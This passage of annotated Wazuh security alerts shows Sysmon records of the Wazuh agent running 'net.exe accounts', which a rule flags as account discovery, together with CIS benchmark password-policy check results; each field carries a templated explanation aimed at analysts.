FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be35-680a-030c-000000000e00}
ParentProcessId: 10832
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.369 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be35-680a-050c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11376 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be35-680a-030c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2183679 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.4317579Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288458 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.425
ProcessGuid: {94294ddc-be35-680a-060c-000000000e00}
ProcessId: 4616
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.425 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be35-680a-060c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2188912 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26001 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Maximum password age' is set to '365 or fewer days, but not 0'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting defines how long a user can use their password before it expires. Values for this policy setting range from 0 to 999 days. If you set the value to 0, the password will never expire. Because attackers can crack passwords, the more frequently you change the password the less opportunity an attacker has to use a cracked password. However, the lower this value is set, the higher the potential for an increase in calls to help desk support due to users having to change their password or forgetting which password is current. The recommended state for this setting is 365 or fewer days, but not 0. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The longer a password exists the higher the likelihood that it will be compromised by a brute force attack, by an attacker gaining general knowledge about the user, or by the user sharing the password. Configuring the Maximum password age setting to 0 so that users are never required to change their passwords is a major security risk because that allows a compromised password to be used by the malicious user for as long as the valid user has authorized access. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 365 or fewer days, but not 0: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Maximum password age Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Minimum password length' is set to '14 or more character(s)'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['1.1.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['5.2'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534519.2194244 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26003 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Minimum password length' is set to '14 or more character(s)'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines the least number of characters that make up a password for a user account. There are many different theories about how to determine the best password length for an organization, but perhaps 'passphrase' is a better term than 'password.' In Microsoft Windows 2000 and newer, passphrases can be quite long and can include spaces. Therefore, a phrase such as 'I want to drink a $5 milkshake' is a valid passphrase; it is a considerably stronger password than an 8 or 10 character string of random numbers and letters, and yet is easier to remember. Users must be educated about the proper selection and maintenance of passwords, especially with regard to password length. In enterprise environments, the ideal value for the Minimum password length setting is 14 characters, however you should adjust this value to meet your organization's business requirements. The recommended state for this setting is: 14 or more character(s). Note: In Windows Server 2016 and older versions of Windows Server, the GUI of the Local Security Policy (LSP), Local Group Policy Editor (LGPE) and Group Policy Management Editor (GPME) would not let you set this value higher than 14 characters. However, starting with Windows Server 2019, Microsoft changed the GUI to allow up to a 20 character minimum password length. Note #2: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Types of password attacks include dictionary attacks (which attempt to use common words and phrases) and brute force attacks (which try every possible combination of characters). Also, attackers sometimes try to obtain the account database so they can use tools to discover the accounts and passwords. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to 14 or more character(s): Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Minimum password length Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 1.1.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['net.exe accounts'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2200582 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.7743593Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288469 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.769
ProcessGuid: {94294ddc-be35-680a-080c-000000000e00}
ProcessId: 10112
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be35-680a-060c-000000000e00}
ParentProcessId: 4616
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.769 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be35-680a-080c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10112 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be35-680a-060c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2205637 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.8470037Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288473 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.841
ProcessGuid: {94294ddc-be35-680a-090c-000000000e00}
ProcessId: 15044
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.841 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be35-680a-090c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
